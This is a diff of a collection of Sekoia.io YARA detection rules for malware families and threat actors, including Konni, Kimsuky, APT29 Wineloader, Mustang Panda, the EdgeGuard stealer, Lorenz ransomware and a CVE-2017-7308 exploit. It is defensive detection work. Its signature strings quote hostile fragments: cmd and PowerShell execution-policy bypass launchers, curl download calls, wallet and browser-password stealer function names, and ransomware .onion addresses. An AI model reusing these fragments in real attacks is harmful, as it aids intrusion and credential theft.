-		logic_hash = "1b9e9a3f4fb4804eb94ab8d3573781d67f96d180b258cfc10be384eec44509ed"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_konni_wpnprv.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "32178c97795aeead9c186e0b7fb508376045acb7534e6ce9e617c06fd399c3da"
 		score = 75
-		quality = 78
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880"
-		hash2 = "bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49"
-		hash3 = "7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407"
-		hash4 = "e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c"
 
 	strings:
-		$down_exec1 = "_down_update_run" nocase
-		$down_exec2 = "downAndExec" nocase
-		$encrypt1 = "_encrypt_pdf"
-		$encrypt2 = "_encrypt_data"
-		$error_msg1 = "_alertErr"
-		$error_msg2 = "_show_error_msg"
-		$view_pdf1 = "-[PEPWindow view_pdf:]"
-		$view_pdf2 = "-[PEPWindow viewPDF:]"
-		$macho_magic = {CF FA ED FE}
-		$java_magic = {CA FE BA BE}
+		$ = "wpnprv.dll"
+		$ = "IIIIIIII" fullword
+		$ = "wusa.exe" wide
+		$ = "winver.exe" wide
+		$ = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$ = "taskmgr.exe" wide
 
 	condition:
-		($macho_magic at 0 or $java_magic at 0 ) and 5 of them and filesize > 50KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Downloader_Win_Newsterminal : FILE
+rule SEKOIA_Crypter_Vbs_To_Exe
 {
 	meta:
-		description = "Detect the PowerShell based downloader used by APT42 called NEWSTERMINAL"
+		description = "first stage of Crypter-VBS-to-EXE dropped on infected hosted"
 		author = "Sekoia.io"
-		id = "2f9aae45-e3bd-4d87-b336-5d141738952b"
-		date = "2024-08-26"
+		id = "33ed286f-3055-452e-952b-abaf11a543a1"
+		date = "2023-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_newsterminal.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2b756515400d7e3b6e21ee3a83f313c8"
-		logic_hash = "45c6c2b5b3723bf3ed46c82e6a254547d8c8b3446bb2fa4b4f0fc8441731ae7e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crypter_vbs_to_exe.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4b3a411de3f36a7f9a310e1b789988c3d9d53eb195d04b374bdf1e5b4157b1e9"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 55
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Start-Process -FilePath $takeownCommand -ArgumentList $takeownArgs -Wait -NoNewWindow"
-		$ = "function Download-And-Extract-Dll {"
-		$ = {24 69 63 61 63 6C 73 41 72 67 73 20 3D 20 24 64 65 73 74 69 6E 61 74 69 6F 6E 46 69 6C 65 50 61 74 68 2C 20 22 2F 67 72 61 6E 74 22 2C 20 22 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 73 3A 46 22 2C 20 22 2F 63 22 2C 20 22 2F 71 22}
-		$ = "$publicip=(iwr http://127.0.0.1:4040/api/tunnels"
+		$theDot = ":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" ascii
+		$s1 = "cmd.exe /c curl" ascii
+		$s2 = "WScript.Sleep(3000)" ascii
+		$s3 = "runCmd = \"cmd.exe /c powershell.exe -exec Bypass -C \" + myVar +" ascii
+		$s4 = "WshShell.Run \"cmd /c \" & runCmd, 0, True" ascii
 
 	condition:
-		1 of them and filesize < 30KB
+		#theDot> 200 and all of ( $s* )
 }
-rule SEKOIA_Suspicious_Users_Dev : FILE
+rule SEKOIA_Apt_Konni : FILE
 {
 	meta:
-		description = "Nirscord stealer"
+		description = "Rule based on structure offsets and file extension"
 		author = "Sekoia.io"
-		id = "9e8af456-6f84-4922-a262-20b8f5c8a1eb"
-		date = "2022-12-22"
+		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
+		date = "2022-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/suspicious_users_dev.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6084b319efb7b4137517c63dd2ed1023a4b25513b7ac50e95154bbac0fea0af7"
-		score = 65
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_konni.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8f178421fd0968f4ce809054022579c7fc8dede5f6514e89966d13acb83d75d9"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$user1 = "\\Users\\raghus1\\" ascii
-		$user2 = "\\Users\\drill\\" ascii
-		$key = {58 69 b3 5f b3 87 74 f6 65 eb 96 e7 6f 4d 16 83 }
+		$ext_1 = ".zip" wide ascii fullword
+		$ext_2 = ".cab" wide ascii fullword
+		$ext_3 = ".rar" wide ascii fullword
+		$ext_4 = ".ini" wide ascii fullword
+		$ext_5 = ".dat" wide ascii fullword
+		$offset_structure_1 = { 8d ?? 08 02 00 00 }
+		$offset_structure_2 = { 8d ?? 10 04 00 00 }
+		$offset_structure_3 = { 8d ?? 18 06 00 00 }
+		$url = "%s/dn.php?name=%s&prefix=%s" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 6MB and 1 of ( $user* ) and $key
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of ( $ext_* ) and all of ( $offset_structure_* ) and $url
 }
-rule SEKOIA_Apt_Backdoordiplomaty_Custommerlinagent_Strings : FILE
+rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Hta
 {
 	meta:
-		description = "Detects custom variant of Merlin agent used by BackdoorDiplomaty"
+		description = "Detects malicious HTA used by APT29 to drop Wineloader"
 		author = "Sekoia.io"
-		id = "965693ba-93b8-4c52-9292-957884411968"
-		date = "2024-06-06"
+		id = "5a17d854-0564-4830-a0e5-7867b99716c2"
+		date = "2024-03-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_backdoordiplomaty_custommerlinagent_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "31d13e234dc3f68f6826a5310ac38693750f896318249d04a31c5e6c8d5eba91"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt29_wineloader_malicious_hta.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "efafcd00b9157b4146506bd381326f39"
+		logic_hash = "0cc4692e5ff3f258c287f28030147f725d6a534c4f2f7a2a4ff49a305b7fd13d"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "agent.GetSpecificID"
-		$ = "agent.ExecuteCommand"
-		$ = "agent.getClient"
-		$ = "agent.SignalListen"
+		$ = "<HTA:APPLICATION ID="
+		$ = "var _0x"
+		$ = "Date['\\x6e\\x6f\\x77']"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and all of them
+		all of them
 }
-rule SEKOIA_Infostealer_Win_Edgeguard : FILE
+rule SEKOIA_Exploit_Linux_Eop_Cve20177308_Strings : CVE_2017_7308 FILE
 {
 	meta:
-		description = "Finds EdgeGuard Stealer samples based on specific strings"
+		description = "Detects CVE-2017-7308 exploit"
 		author = "Sekoia.io"
-		id = "bbdb362f-d235-48f8-8fa5-d340d4e3e3f0"
-		date = "2023-08-22"
+		id = "72d225dd-386c-47d5-afb3-c6712c0bdd9a"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_edgeguard.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "11396aea2e166456ec8311f95a8037aac41f69caf3158f8c19cb0c38327842d6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_cve20177308_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c9fd605ced8bb2c3861f642cdc08b99b320ee19658ce60f1b9679a1ccc427bf7"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "CVE-2017-7308, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "main.downloadnecessary" ascii
-		$str02 = "main.extractchromepasswords" ascii
-		$str03 = "main.extracttasksch" ascii
-		$str04 = "main.BrowserDownloadsViewExtract" ascii
-		$str05 = "main.stealmetamask" ascii
-		$str06 = "main.stealexoduswallet" ascii
-		$str07 = "main.moveatomic" ascii
-		$str08 = "main.movefirefoxcookies" ascii
-		$str09 = "main.movepasswords" ascii
-		$str10 = "main.FinallyZIPIPFolder" ascii
-		$str11 = "edgeguard.business" ascii
-		$str12 = "/License.XenArmor" ascii
-		$str13 = "/TaskSchedulerView.exe" ascii
-		$str14 = "/BrowsingHistoryView.exe" ascii
-		$str15 = "/outlookfiles/starter.exe" ascii
-		$str16 = "/outlookfiles/External.zip" ascii
-		$str17 = "/outlookfiles/XenManager.dll" ascii
-		$str18 = "/outlookfiles/EmailPasswordRecoveryPro.exe" ascii
+		$ = "[.] SMEP & SMAP bypass enabled, turning them off"
+		$ = "[.] done, SMEP & SMAP should be off now"
+		$ = "[.] executing get root payload %p"
+		$ = "[.] done, should be root now"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of ( $str* )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Malware_Valleyrat_1Ststage_Strings : FILE
+
+rule SEKOIA_Backdoor_Win_Kimsuky : FILE
 {
 	meta:
-		description = "Detects ValleyRat 1stage"
+		description = "Detect the backdoors used by Kimsuky based on specific PE ressources"
 		author = "Sekoia.io"
-		id = "6628ba47-37ad-4bdb-bbc0-7286d777000e"
-		date = "2024-06-11"
+		id = "db927d1c-34cf-4501-a6ce-3e8ecdefc5a3"
+		date = "2024-06-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_valleyrat_1ststage_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "78c45b8bd9241646512483d179d48b0e42e97fa1c18d6afd1af4423f7b7ce3c6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_kimsuky.yar#L4-L38"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ba40427f7e305a6e6cec6bb0165b49e6ce215ecf66fc2e05954c10e4d9acf9b0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "%016llX.DLL" wide
-		$ = "%s\\%s" wide
-		$ = "%016llX\\%s" wide
-		$ = "connection already in progress"
-		$ = "SleepConditionVariableSRW"
+		hash1 = "000e2926f6e094d01c64ff972e958cd38590299e9128a766868088aa273599c7"
+		hash2 = "cca1705d7a85fe45dce9faec5790d498427b3fa8e546d7d7b57f18a925fdfa5d"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
+		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" )
 }
-rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
+rule SEKOIA_Apt_Mustangpanda_Payload : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Decryption routine of mustang panda payload"
 		author = "Sekoia.io"
-		id = "428eb021-b37f-4db5-8cab-ca2f6dd2e202"
-		date = "2023-10-02"
+		id = "ce7ddf20-e13f-4b5f-8fff-4b1387b29568"
+		date = "2022-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uac0154_powershell_infection_chain_1.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a849c397e7f61e41ea7e67a265717d7d66f6af42f3d1e930020d1433dd3aab18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_payload.yar#L1-L42"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "734d42aed4574de620773f1f2d08c6b1fc206efd1b576f0f3679edcc0b2ce91d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247240,26 +247721,50 @@ rule SEKOIA_Apt_Uac0154_Powershell_Infection_Chain_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "command $es ="
-		$ = "function isV"
-		$ = "doIn;"
-		$ = "System.IO.Comp"
+		$chunk_1 = {
+        89 74 24 ??
+        B9 ?? ?? ?? ??
+        8B 44 24 ??
+        3D ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        0F 4C C1
+        E9 ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        31 DB
+        31 ED
+        31 FF
+        E9 ?? ?? ?? ??
+        8B 44 24 ??
+        B9 ?? ?? ?? ??
+        3B 44 24 ??
+        B8 ?? ?? ?? ??
+        0F 42 C1
+        E9 ?? ?? ?? ??
+        88 5C 24 ??
+        89 6C 24 ??
+        89 7C 24 ??
+        B9 ?? ?? ?? ??
+        8B 44 24 ??
+        3D ?? ?? ?? ??
+        B8 ?? ?? ?? ??
+        0F 4C C1
+        }
 
 	condition:
-		all of them and filesize < 100KB
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Toneshell_Shellcode : FILE
+rule SEKOIA_Crime_Sload_Mainpowershellimplant : FILE
 {
 	meta:
-		description = "Detects first bytes of ToneShell used to call the shellcode or the code to check the MagicNumber (0x17 0x03 0x03)"
+		description = "Detects the main PowerShell implant"
 		author = "Sekoia.io"
-		id = "5ac8d2e9-dbeb-42f9-8343-1281510d4411"
-		date = "2024-10-02"
+		id = "09d268e7-d688-4390-856e-9e9ed47aec04"
+		date = "2022-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_toneshell_shellcode.yar#L1-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0e164677681dce2aa75d3621d9f3df1449c3e67a3551817693856d80ccc48eca"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_mainpowershellimplant.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "37ec263dddf7719d03a3d58b4b196597737a1e28f8072f3933cdf954f2b696cd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247267,42 +247772,41 @@ rule SEKOIA_Apt_Toneshell_Shellcode : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$code = {55 8b ec 83 ec 0c e8 85 00 00 00 6a 00 6a 00 6a 02 6a 00 6a 00 68 00 00 00 10}
-		$MagicNumberParser = {
-        B8 01 00 00 00
-        6B C8 00
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 17
-        75 ??
-        B9 01 00 00 00
-        C1 E1 00
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 03
-        75 ??
-        B9 01 00 00 00
-        D1 E1
-        8B 55 ??
-        0F BE 04 0A
-        83 F8 03
-        }
+		$c1 = "priority FOREGROUND"
+		$c2 = "app|Services|RuntimeBroker|Search|host"
+		$c3 = "([wmiclass]\"win32_Process\").create("
+		$c4 = "Start-Sleep -seconds"
+		$c5 = "while($e -eq 1){ $dCnt++;"
+		$d1 = "112,114,105,111,114,105,116,121,32,70,79,82,69,71,82,79,85,78,68"
+		$d2 = "97,112,112,124,83,101,114,118,105,99,101,115,124,82,117,110,116,105,109,101,66,114,111,107,101,114,124,83,101,97,114,99,104,124,104,111,115,116"
+		$d3 = "40,91,119,109,105,99,108,97,115,115,93,34,119,105,110,51,50,95,80,114,111,99,101,115,115,34,41,46,99,114,101,97,116,101,40"
+		$d4 = "83,116,97,114,116,45,83,108,101,101,112,32,45,115,101,99,111,110,100,115"
+		$d5 = "119,104,105,108,101,40,36,101,32,45,101,113,32,49,41,123,32,36,100,67,110,116,43,43,59"
+		$b1 = "priority FOREGROUND" base64
+		$b2 = "app|Services|RuntimeBroker|Search|host" base64
+		$b3 = "([wmiclass]\"win32_Process\").create(" base64
+		$b4 = "Start-Sleep -seconds" base64
+		$b5 = "while($e -eq 1){ $dCnt++;" base64
 
 	condition:
-		any of them and filesize < 1MB
+		3 of ( $c* ) or 3 of ( $d* ) or 3 of ( $b* ) and filesize < 30KB
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
+rule SEKOIA_Tool_Execit_Obfuscator_Strings : FILE
 {
 	meta:
-		description = "Detects Gamaredon HTMLSmuggling attachment"
+		description = "Detects ExecIT Dlls"
 		author = "Sekoia.io"
-		id = "e82335ea-48d5-409c-a270-cfd5a2197c44"
-		date = "2023-01-20"
+		id = "59eaeb20-150b-41a4-b866-1c91a07623ac"
+		date = "2024-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_htmlsmuggling_attachment_stage2.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "42e637f628db6719342ae104c6c89bb80609c5f3f5c2586daccb31f7d688a2a1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_execit_obfuscator_strings.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "1c185e2e11d8eadccfb130766ca30d85"
+		hash = "a0898f57f2b139ea278d8a7e97bbe358"
+		hash = "e0e12a8891f5585ce1ad55dbffb4f9c2"
+		hash = "d4102676d536bacffcf6c94364e26828"
+		logic_hash = "cd8edbe9c6cb7dcde56860e0ff47f4496b36848f46a89f6945b7762f86ff5e59"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247310,221 +247814,222 @@ rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment_Stage2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ") == -1) die();" ascii
-		$ = "'data:application/x-rar-compressed;base64, ' +" ascii
-		$ = ".appendChild(img);" ascii
-		$ = "['Win32', 'Win64', 'Windows', 'WinCE'].indexOf(" ascii
-		$ = " = navigator[\"platform\"];" ascii
+		$ = "yromeMlautriVetacollAtN"
+		$ = "xEdaerhTetaerCtN"
+		$ = "tcejbOelgniSroFtiaWtN"
+		$ = "lld.esablenrek"
+		$ = "txetnoCdaerhTteG"
+		$ = "txetnoCdaerhTteS"
+		$ = "cef_api_hash"
+		$ = "cef_execute_process"
+		$ = "cef_get_path"
 
 	condition:
-		4 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 5 of them
 }
-rule SEKOIA_Ransomware_Win_Lorenz : FILE
+rule SEKOIA_Backdoor_Win_Feedload : FILE
 {
 	meta:
-		description = "Detect the Lorenz ransomware"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "6936cc61-efe5-4d13-b76f-e808ab331457"
-		date = "2022-02-10"
+		id = "29cc46c4-7ed7-4a34-9749-a8ba8d37eb4c"
+		date = "2023-10-24"
 		modified = "2024-12-19"
-		reference = "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_lorenz.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "355de0f172c9e877bbca7f75c0bfb07d83ae7f43e7674a7f84c4e4d519dfa7c0"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_feedload.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f251144f7ad0be0045034a1fc33fb896e8c32874e0b05869ff5783e14c062486"
+		logic_hash = "18eb3fc9b11ed21a76a2921c3d9681b09cf2f306263c2ece76c1bf4a65467777"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".onion" ascii
-		$s2 = "---===Lorenz. Welcome. Again. ===--" ascii
-		$s3 = ".Lorenz.sz40" ascii
-		$url1 = "egypghtljedbs3x3ui45tfhosakzb376epl7baq2ruzfyewcypswhgqd.onion" ascii
-		$url2 = "lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion" ascii
-		$url3 = "vsoonropylvbfqnq2urk7uhaxn7afiwgldnj3ntc743awigojm4p7lid.onion" ascii
-		$url4 = "kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
-		$url5 = "vldkrmiqriwlgm2wuxg42nvc6kqsdzsdhsybn27hyn34d66465fxz7id.onion" ascii
+		$s1 = "                                        C:\\LibreSS5\\crypto\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 900KB and filesize < 1200KB and ( all of ( $s* ) or 1 of ( $url* ) )
+		uint16be( 0 ) == 0x4d5a and #s1 > 200
 }
-rule SEKOIA_Infostealer_Win_Solarmarker_Powershell : FILE
+rule SEKOIA_Apt_Gamaredon_Gamaredon_Lnk_Usb_Spreader
 {
 	meta:
-		description = "Finds SolarMarker PowerShell script based on characteristic strings"
+		description = "Detects Gamaredon LNK USB Spreader"
 		author = "Sekoia.io"
-		id = "a2fe7f09-7134-4054-ba40-5ea66785a26d"
-		date = "2022-12-09"
+		id = "a0972e30-bfc5-48ff-b04b-382db8c08a54"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_solarmarker_powershell.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "32267cf7e03ed65da969aeeff5ef5d7291e47446ea11a4b391f085967e8aa67d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_gamaredon_lnk_usb_spreader.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581"
+		logic_hash = "3adb2433eda559d9b32316f4733741b0fc8c576937b1decede8bc7d23b203a0e"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 64
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fun = "function " ascii
-		$ps0 = "return -join (0..(10..30|Get-Random)|%{[char]((65..90)+(97..122)|Get-Random)})" ascii
